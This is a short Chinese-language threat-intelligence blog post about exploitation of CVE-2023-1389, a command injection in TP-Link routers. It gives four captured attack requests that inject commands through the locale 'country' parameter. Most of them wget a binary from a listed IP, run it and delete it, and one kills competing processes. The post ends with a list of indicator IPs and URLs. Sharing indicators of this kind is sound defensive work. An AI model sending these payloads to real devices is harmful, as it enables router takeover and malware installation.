CVE-2023-1389攻击威胁情报
网络安全 2024-06-20 09:10 1003阅读
CVE-2023-1389攻击手法
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60)
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F66.187.6.203%2Fshk%3B+chmod+777+shk%3B+
.%2Fshk+tplink%3B+rm+-rf+shk%60)
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.71.83%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+b
uffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24bu
ffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22dvrLocker%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60)
威胁情报
103.149.28.141 66.187.6.203 94.156.71.83 66.187.6.155 45.148.10.78 185.191.127.212 45.148.10.174 84.54.51.37 31.220.1.83 http://103.149.28.141/t http://66.187.6.203/shk http://94.156.71.83/r http://66.187.6.155/shk http://45.148.10.78/shk
喜欢请常来,打赏请随意。
